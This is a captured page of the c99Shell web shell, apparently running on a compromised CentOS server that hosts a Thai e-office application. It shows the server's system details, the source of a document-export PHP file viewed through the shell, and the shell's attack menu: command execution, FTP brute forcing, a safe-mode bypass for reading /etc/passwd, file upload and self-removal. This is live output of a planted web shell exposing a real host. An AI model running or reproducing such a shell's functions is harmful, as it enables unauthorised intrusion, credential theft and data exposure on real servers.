!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     exportDocHTML2.php (4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsDocType.php";
include_once 
"../link/keyThai.php";
include_once 
"../link/functionshow.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"functforRptEx.php";

if(
$typeDoc=="printword"){
header("Content-Type: application/msword");
header('Content-Disposition: attachment; filename="Doc1.doc"');
}

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);
$oDt = new doctype($oC);
$InputThai=$oSys->SearchByInputThai();
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
?>
<style type="text/css">
div.img-show img {
    width: 3cm;
    height: 3cm;
    overflow: hidden;
    text-align: center;
}
</style>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<? if($typeDoc=="printhtml"){ ?>
<link href="../source/style.css" rel="stylesheet" type="text/css">
<? }?>
</head>
<body>
<table  width="90%"  align="center">
<tr><td >
        <table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" >
        <? if($DclID!=0){ ?>
        <tr>
            <td align="center" colspan=2><? $oDcl->SearchByKey($DclID); $oDcl->GetRecord();  echo $oDcl->DclName;?></td>
        </tr>
        <? }?>        
        <? if($typeDoc=="printhtml"){ ?>
        <tr><td align="center" height="22" colspan=2><div class="img-show"><img src="../picture/Tra-Khrut.gif"></div></td></tr>
        <? ?>
        <? if($DslID!=0){ ?>
        <tr>
            <td align="left" colspan=2><? $oDsl->SearchByKey($DslID); $oDsl->GetRecord();  echo $oDsl->DslName;?></td>
        </tr>
        <? }?>    
        <tr>
            <td align=left colspan=2><? echo ShowNameDocNo($dt); ?></td>
        </tr>
        <tr>
            <td align=left colspan=2>¶Ö§&nbsp;<? echo $DocTo?></td>
        </tr>
        <tr>
            <td colspan=2>&nbsp;</td>
        </tr>
        <tr>
            <td colspan=2><p style="text-align: justify;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<? echo nl2br($DocDetail1); ?></p></td>
        </tr>
        <? if($DocDetail2!=''){ ?>
        <tr>
            <td colspan=2><p style="text-align: justify;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<? echo nl2br($DocDetail2); ?></p></td>
        </tr>
        <? }?>
        <? if($DocDetail3!=''){ ?>
        <tr>
            <td colspan=2><p style="text-align: justify;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<? echo nl2br($DocDetail3); ?></p></td>
        </tr>
        <? }?>
        <? if($DocDetail4!=''){ ?>
        <tr>
            <td colspan=2><p style="text-align: justify;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<? echo nl2br($DocDetail4); ?></p></td>
        </tr>
        <? }?>
        <tr>
            <td align=left colspan=2>&nbsp;</td>
        </tr>
        <tr>
            <td align=center colspan=2><p style="padding-left: 10%;"><? echo $DocEndSign;?></p></td>
        </tr>
        <tr>
            <td align=left colspan=2>&nbsp;</td>
        </tr>
        <tr>
            <td align=left colspan=2>&nbsp;</td>
        </tr>
        <tr>
            <td align=left colspan=2>&nbsp;</td>
        </tr>
        <tr>
            <td width=50%>&nbsp;</td><td align=left width=50%>
            <? list($day1,$month1,$year1) = preg_split('[/]',$DocDateSign);  $s=$day1."-".$month1."-".$year1;  echo fullDateRpt($s); ?></td>
        </tr>
        <tr>
            <td align=left colspan=2><? echo $DocOwnerSign;?></td>
        </tr>
        <tr>
            <td align=left colspan=2>â·Ã. <? echo $DocPhone;?></td>
        </tr>
        <tr>
            <td align=left colspan=2>&nbsp;</td>
        </tr>
        <? if($DclID!=0){ ?>
        <tr>
            <td align="center" colspan=2><? $oDcl->SearchByKey($DclID); $oDcl->GetRecord();  echo $oDcl->DclName;?></td>
        </tr>
        <? }?>
        </table> 
</td></tr></table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]--